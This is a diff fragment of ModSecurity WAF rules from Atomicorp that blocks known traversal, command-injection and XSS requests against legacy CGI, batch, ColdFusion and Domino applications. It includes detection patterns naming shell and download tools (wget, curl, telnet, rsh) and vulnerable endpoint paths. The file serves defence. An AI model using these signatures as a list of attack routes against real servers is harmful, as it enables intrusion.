+SecRule REQUEST_URI "/ttawebtop\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310118,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttawebtop.cgi arbitrary file attempt',chain"
+SecRule ARGS:pg "\.\./"
+
+
+# Rule 310127:  cssearch.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/cssearch\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310127,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  cssearch.cgi arbitrary command execution attempt',chain"
+SecRule REQUEST_URI "(\`|')"
+
+
+# Rule 310129:  loadpage.cgi directory traversal attempt
+SecRule REQUEST_URI "/loadpage\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310129,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  loadpage.cgi directory traversal attempt',chain"
+SecRule ARGS:file "\.\./"
+
+
+# Rule 310130: faqmanager.cgi arbitrary file access attempt
+SecRule REQUEST_URI "/faqmanager\.f?cgi\?toc="         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310130,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: faqmanager.cgi arbitrary file attempt',chain"
+SecRule REQUEST_URI "(?:cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|(?:w|ftp)get|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"
+
+
+# Rule 310131:  Home Free search.cgi directory traversal attempt
+SecRule REQUEST_URI "/search\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310131,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Home Free search.cgi directory traversal attempt',chain"
+SecRule ARGS:letter "\.\./\.\."
+
+
+# Rule 310132:  pfdisplay.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/pfdisplay\.f?cgi\?'"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310132,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  pfdisplay.cgi arbitrary command execution attempt'"
+
+
+# Rule 310133:  pagelog.cgi directory traversal attempt
+SecRule REQUEST_URI "/pagelog\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310133,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  pagelog.cgi directory traversal attempt',chain"
+SecRule ARGS:name "\.\./"
+
+
+# Rule 310134:  talkback.cgi directory traversal attempt
+SecRule REQUEST_URI "/talkbalk\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310134,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  pagelog.cgi directory traversal attempt',chain"
+SecRule ARGS:article "\.\./\.\./"
+
+
+# Rule 310135:  emumail.cgi NULL attempt
+SecRule REQUEST_URI "/emumail\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  emumail.cgi NULL attempt'"
+SecRule REQUEST_URI "\x00" 
+
+# Rule 310136:  technote main.cgi directory traversal attempt
+SecRule REQUEST_URI "/technote/main\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  technote main.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./\.\./"
+
+
+# Rule 310137:  technote print.cgi directory traversal attempt
+SecRule REQUEST_URI "/technote/print\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310137,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  technote print.cgi directory traversal attempt'"
+SecRule REQUEST_URI "\x00" 
+
+# Rule 310138:  Allaire Pro Web Shell attempt
+SecRule REQUEST_URI "/authenticate.f?cgi\?password"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310138,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Allaire Pro authenticate.cgi shell attempt',chain"
+SecRule REQUEST_URI "config\.ini"
+
+
+# Rule 310139:  Armada Style Master Index directory traversal
+SecRule REQUEST_URI "/search\.cgi\?keys"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310139,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Armada Style Master search.cgi directory traversal attempt',chain"
+SecRule ARGS:catigory|ARGS:category "\.\./"
+
+
+# Rule 310140:  cached_feed.cgi moreover shopping cart directory
+#	traversal
+SecRule REQUEST_URI "/cached_feed\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Moreover cached_feed.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./"
+
+
+# Rule 310141:  Talentsoft Web+ exploit attempt
+SecRule REQUEST_URI "/webplus.f?cgi\?script=/webplus/webping/webping\.wml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310141,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Talentsoft Web+ exploit attempt'"
+
+
+# Rule 310142:  bizdbsearch attempt
+SecRule REQUEST_URI "/bizdb1-search\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310142,rev:1,severity:3,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Bizdbsearch bizdb1-search.cgi mail attempt',chain"
+SecRule REQUEST_URI "mail"
+
+
+# Rule 310143:  sojourn.cgi File access attempt
+SecRule REQUEST_URI "/sojourn\.f?cgi\?cat"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310143,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  sojourn.cgi file access attempt'"
+SecRule REQUEST_URI "\x00" 
+
+# Rule 310144:  SGI Infosearch fname attempt
+SecRule REQUEST_URI "/infosrch\.f?cgi\?"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310144,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  infosrch.cgi fname attempt',chain"
+SecRule REQUEST_URI "fname="
+
+
+# Rule 310145:  store.cgi directory traversal attempt
+SecRule REQUEST_URI "/store\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310145,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  store.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./"
+
+
+# Rule 310146:  SIX webboard generate.cgi file access attempt
+SecRule REQUEST_URI "/generate\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310146,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  generate.cgi file access attempt',chain"
+SecRule REQUEST_URI "content=\.\./"
+
+
+# Rule 310148:  mrtg.cgi directory traversal attempt
+SecRule REQUEST_URI "/mrtg\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  mrtg.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "cfg=/\.\./"
+
+
+# Rule 310149:alienform.cgi directory traversal attempt
+#SecRule REQUEST_URI "/alienform\.f?cgi.*\.\|7c\|\./\.\|7c\|\." #        "id:310149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  alienform.cgi directory traversal attempt',chain"
+#SecRule REQUEST_URI "/af\.f?cgi.*\.\|7c\|\./\.\|7c\|\."
+
+
+# Rule 310150:  CCBill whereami.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/whereami\.f?cgi\?g="         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310150,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  CCbill whereami.cgi command execution attempt'"
+
+
+# Rule 310151:  MDaemon form2raw.cgi overflow attempt
+SecRule REQUEST_URI "/form2raw\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310151,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  MDaemon form2raw.cgi overflow attempt'"
+
+
+# Rule 310152:  WhatsUpGold instancename overflow attempt
+SecRule REQUEST_URI "/_maincfgret\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310152,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  WhatsUpGold _maincfgret.cgi overflow attempt'"
+
+
+# Rule 310213: book.cgi arbitrary command execution attempt
+#SecRule REQUEST_URI  "/book\.f?cgi.*current=.*7c" #        "id:310213,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: book.cgi arbitrary command execution attempt'"
+
+
+# Rule 310250: include cgi command exec
+SecRule REQUEST_URI "/includer\.f?cgi\?=\|"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310250,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: includer.cgi command execution attempt'"
+
+
+# Rule 310265: proxy grabber
+SecRule REQUEST_URI  "/proxy-grabber\.com/cgi-bin/v2/nph-env\.f?cgi\?"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310265,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Proxy Grabber nph-env.cgi access attempt'"
+
+
+# Rule 310301: ads.cgi command execution attempt
+SecRule REQUEST_URI "/ads\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310301,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ads.cgi local command execution attempt'"
+SecRule ARGS:file "\.\./\.\./" 
+
+# Rule 310302: webdist.cgi arbitrary command attemp
+#SecRule REQUEST_URI "/webdist\.f?cgi.*distloc=.*3b" #        "id:310302,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webdist.cgi local command execution attempt'"
+
+
+# Rule 310303: enter_bug.cgi arbitrary command attempt
+#SecRule REQUEST_URI "/enter_bug\.f?cgi.*who.*3b" #        "id:310303,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: enter_bug.cgi local command execution attempt'"
+
+#SecRule REQUEST_URI "/index\.f?cgi\?action=.*&cat=.*&art=.*\|" #        "id:310459,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: E-Cart index.cgi local command execution attempt'"
+
+
+# Rule 310019: Agora CGI Cross Site Scripting
+# CVE: "CVE-2001-1199"
+SecRule REQUEST_URI  "/store/agora\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310484,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Agora CGI Cross Site Scripting'"
+SecRule ARGS:cart_id  "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+# Rule 310019: cpanel remote command execution
+SecRule REQUEST_URI "/cgi-sys/guestbook\.f?cgi\?user=cpanel&template=\|"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cpanel remote command execution'"
+
+
+# Rule 310019: Zeus Admin Interface XSS
+SecRule REQUEST_URI "/apps/web/vs_diag\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310488,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zeus Admin Interface XSS'"
+SecRule ARGS:server "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+# Rule 310019:  main.cgi directory traversal and file access
+#SecRule REQUEST_URI "/main\.f?cgi\?next_file=*/" #        "id:310490,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: main.cgi directory traversal and file access'"
+
+
+# Rule 310019: pdesk directory traversal and file theft
+SecRule REQUEST_URI "/cgi-bin/pdesk\.f?cgi\?lang=(?:\.\./\.\./|/etc|/tmp|/home|/var)"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310593,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pdesk directory traversal and file theft'"
+
+
+# Rule 310019: WebAPP Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "index\.cgi" 	"phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390014,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebAPP XSS attack'"
+SecRule ARGS:action|ARGS:id|ARGS:num|ARGS:board|ARGS:cat|ARGS:writer|ARGS:viewcat|ARGS:img|ARGS:curcatname|ARGS:vsSD "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: Cholod Mysql based message board Script Insertion and SQL Injection
+SecRule REQUEST_URI "/mb\.cgi" 	"phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: X-Changer XSS Vulnerability'"
+SecRule ARGS:Name|ARGS:Subject|ARGS:Message "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: Censtore.cgi exploit
+SecRule REQUEST_URI "/censtore\.cgi\?page=\|"  "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390042,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Censtore.cgi exploit'"
+
+
+# Rule 310019: Censtore.cgi exploit
+SecRule REQUEST_URI "/test\.f?cgi"  "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:393134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Test.fcgi or test.cgi access'"
+
+SecMarker END_CGI_JITP
+
+#Shell applications
+SecRule REQUEST_FILENAME "@endswith .sh"         "id:333876,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309010,t:none,pass,nolog,noauditlog,skipAfter:END_SHELL_JITP"
+
+
+# Rule 310107:  bb-hist.sh attempt
+SecRule REQUEST_URI "/bb-hist\.sh\?histfile=\.\./\.\."         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: bb-hist.sh directory traversal attempt'"
+
+
+# Rule 310108:  bb-hostscv.sh attempt
+SecRule REQUEST_URI "/bb-hostsvc\.sh\?hostsvc\?\.\./\.\."         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: bb-hostscv.sh attempt'"
+
+
+SecMarker END_SHELL_JITP
+
+#Batch File applications
+SecRule REQUEST_FILENAME "\.bat"         "id:333877,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309011,t:none,pass,nolog,noauditlog,skipAfter:END_BATCH_JITP"
+
+
+# Rule 310023:  hello.bat arbitrary command execution attempt
+SecRule REQUEST_URI "/hello\.bat"          "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: hello.bat arbitrary command execution attempt',chain"
+SecRule REQUEST_URI "\&"
+
+
+# Rule 310123:  test.bat arbitrary command execution attempt
+SecRule REQUEST_URI "/test.bat(?:\|7c\||\x7c)"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310123,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: test.bat arbitrary command execution attempt'"
+
+
+# Rule 310124:  input.bat arbitrary command execution attempt
+SecRule REQUEST_URI "/input.bat(?:\|7c\||\x7c)"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310124,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: input.bat arbitrary command execution attempt'"
+
+
+# Rule 310125:  envout.bat arbitrary command execution attempt
+SecRule REQUEST_URI "/envout.bat(?:\|7c\||\x7c)"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310125,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: envout.bat arbitrary command execution attempt'"
+
+
+# Rule 310126:  hello.bat arbitrary command execution attempt
+SecRule REQUEST_URI "/hello\.bat"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310126,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: hello.bat arbitrary command execution attempt',chain"
+SecRule REQUEST_URI "\&"
+
+
+# Rule 310019: Apache Remote Command Execution via .bat files
+# CVE: "CVE-2002-0061"
+SecRule REQUEST_URI  "/test-cgi\.bat\?\|"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310485,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Remote Command Execution via .bat files'"
+
+
+SecMarker END_BATCH_JITP
+
+
+#Coldfusion applications
+SecRule REQUEST_URI "\.(cfm|map)"         "id:333878,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:replaceNulls,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309012,t:none,pass,nolog,noauditlog,skipAfter:END_COLDFUSION_JITP"
+
+
+# Rule 310155:  exampleapp application.cfm
+SecRule REQUEST_URI "/cfdocs/exampleapp/email/application\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion exampleapp e-mail application.cfm access attempt'"
+
+
+# Rule 310156:  application.cfm access
+SecRule REQUEST_URI "/cfdocs/exampleapp/publish/admin/application\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion exampleapp publisher application.cfm access attempt'"
+
+
+# Rule 310157:  getfile.cfm access
+SecRule REQUEST_URI "/cfdocs/exampleapp/email/getfile\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion exampleapp e-mail getfile.cfm access attempt'"
+
+
+# Rule 310158:  addcontent.cfm access
+SecRule REQUEST_URI "/cfdocs/exampleapp/publish/admin/addcontent\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion exampleapp addcontent.cfm access attempt'"
+
+
+# Rule 310159:  administrator access
+#SecRule REQUEST_URI "/cfide/administrator/index\.cfm" #        "id:310159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion administrator access attempt'"
+#
+
+# Rule 310160:  fileexists.cfm access
+SecRule REQUEST_URI "/cfdocs/snippets/fileexists\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion fileexists.cfm access attempt'"
+
+
+# Rule 310161:  exprcalc access
+SecRule REQUEST_URI "/cfdocs/expeval/exprcalc\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion expercalc.cfm access attempt'"
+
+
+# Rule 310162:  parks access
+SecRule REQUEST_URI "/cfdocs/examples/parks/detail\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion parks detail.cfm access attempt'"
+
+
+# Rule 310163:  cfappman access
+SecRule REQUEST_URI "/cfappman/index\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310163,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion cfappman index.cfm access attempt'"
+
+
+# Rule 310164:  beaninfo access
+SecRule REQUEST_URI "/cfdocs/examples/cvbeans/beaninfo\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion beaninfo.cfm access attempt'"
+
+
+# Rule 310165:  evaluate.cfm access
+SecRule REQUEST_URI "/cfdocs/snippets/evaluate\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion evaluate.cfm access attempt'"
+
+
+# Rule 310166:  expeval access
+SecRule REQUEST_URI "/cfdocs/expeval/"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310166,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion expeval access attempt'"
+
+
+# Rule 310167:  displayfile access
+SecRule REQUEST_URI "/cfdocs/expeval/displayopenedfile\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310167,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion displayfile access attempt'"
+
+
+# Rule 310168:  mainframeset access
+SecRule REQUEST_URI "/cfdocs/examples/mainframeset\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310168,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion mainframeset.cfm access attempt'"
+
+
+# Rule 310171:  cfmlsyntaxcheck.cfm access
+SecRule REQUEST_URI "/cfdocs/cfmlsyntaxcheck\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310171,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion cfmlsyntaxcheck.cfm access attempt'"
+
+
+# Rule 310172:  application.cfm access
+SecRule REQUEST_URI "/application\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310172,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion application.cfm direct access attempt'"
+
+
+# Rule 310173:  onrequestend.cfm access
+SecRule REQUEST_URI "/onrequestend\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310173,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion onrequestend.cfm direct access attempt'"
+
+
+# Rule 310174:  startstop.cfm DoS access attempt
+SecRule REQUEST_URI "/cfide/administrator/startstop\.html"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310174,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion startstop.cfm DoS attempt'"
+
+
+# Rule 310175:  gettempdirectory.cfm access
+SecRule REQUEST_URI "/cfdocs/snippets/gettempdirectory\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310175,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion gettempdirectory.cfm direct access attempt'"
+
+
+# Rule 310176:  sendmail.cfm access
+SecRule REQUEST_URI "/sendmail\.cfm"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310176,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion sendmail.cfm direct access attempt'"
+
+
+# Rule 310154:  cfcache.map access
+SecRule REQUEST_URI "/cfcache\.map"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion cfcache.map file access attempt'"
+
+
+
+SecMarker END_COLDFUSION_JITP
+
+
+#Domino applications
+SecRule REQUEST_FILENAME "@endswith .nsf"         "id:333879,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309013,t:none,pass,nolog,noauditlog,skipAfter:END_DOMINO_JITP"
+
+
+# Rule 310185:  Domino catalog.nsf access
+SecRule REQUEST_URI "/catalog\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310185,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino catalog.nsf access attempt'"
+
+
+# Rule 310186:  Domino domcfg.nsf access
+SecRule REQUEST_URI "/domcfg\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino domcfg.nsf access attempt'"
+
+
+# Rule 310187:  Domino domlog.nsf access
+SecRule REQUEST_URI "/domlog\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino domlog.nsf access attempt'"
+
+
+# Rule 310188:  Domino log.nsf access
+SecRule REQUEST_URI "/log\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310188,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino log.nsf access attempt'"
+
+
+# Rule 310189:  Domino names.nsf access
+SecRule REQUEST_URI "/names\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310189,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino names.nsf access attempt'"
+
+
+# Rule 310190:  Domino mab.nsf access
+SecRule REQUEST_URI "/mab\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino mab.nsf access attempt'"
+
+
+# Rule 310191:  Domino cersvr.nsf access
+SecRule REQUEST_URI "/cersvr\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino cersvr.nsf access attempt'"
+
+
+# Rule 310192:  Domino setup.nsf access
+SecRule REQUEST_URI "/setup\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino setup.nsf access attempt'"
+
+
+# Rule 310193:  Domino statrep.nsf access
+SecRule REQUEST_URI "/statrep\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino statrep.nsf access attempt'"
+
+
+# Rule 310194:  Domino webadmin.nsf access
+SecRule REQUEST_URI "/webadmin\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310194,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino webadmin.nsf access attempt'"
+
+
+# Rule 310195:  Domino events4.nsf access
